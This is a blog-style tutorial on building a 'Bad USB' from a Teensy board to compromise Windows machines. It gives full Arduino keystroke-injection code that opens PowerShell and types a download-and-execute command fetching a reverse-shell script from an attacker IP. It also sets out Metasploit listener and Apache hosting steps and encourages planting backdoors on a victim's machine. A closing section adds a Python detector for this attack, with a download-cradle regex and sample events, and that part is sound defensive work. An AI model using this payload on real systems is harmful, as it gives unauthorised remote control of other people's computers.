BAD USB using TEENSY

Sharan Raj
Published in iQube
Jun 4, 2019

In the many movies and series I have watched, most hackers perform their attacks via USB. The victims just plug in the USB and their systems are compromised just like that.

So, exploring how to perform this attack, I googled it and found out about this good thing.

Bad USBs:

Most common USB flash drives are exploitable due to the “BadUSB” vulnerability. This allows us, hackers, to reprogram the microcontroller in them to act as a human interface device (HID), e.g., a keyboard, and perform custom keystrokes on our target machine. The hackers program it or upload their desired code into the USB. Once the USB is plugged into the victim’s machine it executes the code.

It works like this:
https://youtu.be/sbKN8FhGnqg

But it costs too much for everyone to afford :-/
While searching for an alternative I found out about this:

Teensy USB Development Board

The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects.

{reference link: https://www.pjrc.com/teensy/}
This costs just a few bucks compared to those Bad USB devices.

Now we’ll proceed to making our bad USB <:-}

Setting up:

  1. Teensy USB (version 3.0+)
  2. Kali Linux (maybe in VM)
  3. Arduino IDE

Configuring the setup:

1. Arduino IDE

Download and install the Arduino IDE to compile the code we will be working on.

2. Setting up Teensy USB on IDE

Download the installer for Windows from: https://www.pjrc.com/teensy/td_146/TeensyduinoInstall.exe
{for other platforms: https://www.pjrc.com/teensy/td_download.html} and install it.

Now go into your IDE and configure the tool

3. Coding:

code:
#include <paensy.h>
#include <Keyboard.h>
int ds = 500;

void setup() {

// Configure the delay that everything else scales off of.
SetDelay(200);
// Configure the delay that the Morse code uses.
SetMorseDelay(250);

// Perform an initial delay to give the USB time to prepare.
PerformInitDelay();

// LED pin number, 13 for 3.1
// 11 for 2 and 2.x
SetLEDPin(13);
// Put the pin into output mode
pinMode(LED_PIN, OUTPUT);
// Turn on the LED pin so we know the device is running.
digitalWrite(LED_PIN, HIGH);
delay(100);
// Run

Keyboard.set_modifier(MODIFIERKEY_GUI);//windows button
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
Keyboard.print("powershell");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);

// Modify 127.0.0.1 with your IP address and with your file

Keyboard.print("IEX (New-Object Net.WebClient).DownloadString('http://10.1.75.77/ShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.1.75.77 -Port 9898");

Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);

Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);

Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_D);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
}

void loop()
{
// blink quickly when complete
digitalWrite(LED_PIN, HIGH);
delay(ds/2);
digitalWrite(LED_PIN, LOW);
delay(ds/2);
}

You can change the keyboard layout (key names) according to your victim’s machine.
Now that the code is ready, we should compile it and upload it to our Teensy.

4. Setting up our Listener

Kali Linux Terminal

Open up your terminal and type the following:

>msfconsole
>use exploit/multi/handler
>set payload windows/x64/shell_reverse_tcp
>set lhost <your ip>
>set lport <the port you are listening>
>run

Remember that the IP address and port in the Teensy code and in your listener should be the same.

5. Setting up the exploit:
As we can see, the Teensy code downloads the file from a link and executes it, so we need a server hosting the file.
On your Kali Linux machine, you have to set up a server to serve that file.
Follow these commands:

>sudo apt-get install apache2
>service apache2 start

Download the file from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Now run the following commands:

>mv Invoke-PowerShellTcp.ps1 ShellTcp.ps1
>cp ShellTcp.ps1 /var/www/html/

Finishing up

Now plug the Teensy USB into the victim’s machine. As soon as it is plugged in, the keystrokes start to run, which finally results in a reverse shell on the victim’s machine.
Now that you have the reverse shell in Metasploit, you can change the payload and use it, by making backdoors and other stuff.
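Seen from the defender's side, the sequence above leaves a recognizable trail: a new keyboard appears, a shell is opened from the Run dialog within seconds, and a download-and-execute line shows up in PowerShell script block logging. The following is an added example, not code from the original post; the event schema, field names and sample events are constructed assumptions that you would map to your own device, process and script block logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical normalized schema (not real logs).
EVENTS = [
    {"t": "2019-06-04T10:00:00", "host": "ws1", "kind": "usb_hid_keyboard_added"},
    {"t": "2019-06-04T10:00:02", "host": "ws1", "kind": "process_start",
     "image": "powershell.exe", "parent": "explorer.exe"},
    {"t": "2019-06-04T10:00:04", "host": "ws1", "kind": "ps_scriptblock",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x.ps1')"},
    # A user opening PowerShell with no new keyboard attached: must not alert.
    {"t": "2019-06-04T11:30:00", "host": "ws2", "kind": "process_start",
     "image": "powershell.exe", "parent": "explorer.exe"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CRADLE = re.compile(r"(iex|invoke-expression).*downloadstring", re.I | re.S)


def detect(events, window=timedelta(seconds=10)):
    """Flag shells started from the Run dialog right after a keyboard appears."""
    last_kbd = {}  # host -> time the most recent HID keyboard was attached
    open_alerts = {}  # host -> (shell start time, alert) awaiting script blocks
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        ts, host = datetime.fromisoformat(ev["t"]), ev["host"]
        if ev["kind"] == "usb_hid_keyboard_added":
            last_kbd[host] = ts
        elif ev["kind"] == "process_start":
            seen = last_kbd.get(host)
            typed_fast = seen is not None and ts - seen <= window
            from_run = ev["parent"].lower() == "explorer.exe"
            if typed_fast and from_run and ev["image"].lower() in SHELLS:
                gap = int((ts - seen).total_seconds())
                alert = {"host": host, "time": ev["t"], "severity": "medium",
                         "reason": f"shell opened {gap}s after a new keyboard"}
                alerts.append(alert)
                open_alerts[host] = (ts, alert)
        elif ev["kind"] == "ps_scriptblock" and host in open_alerts:
            start, alert = open_alerts[host]
            if ts - start <= window and CRADLE.search(ev["text"]):
                alert["severity"] = "high"
                alert["reason"] += "; download-and-execute script block"
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The 10-second window is a tunable assumption. A docking station being attached just before a user opens a shell will also match at medium severity, so treat that level as a triage signal and the script block match as the escalation.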
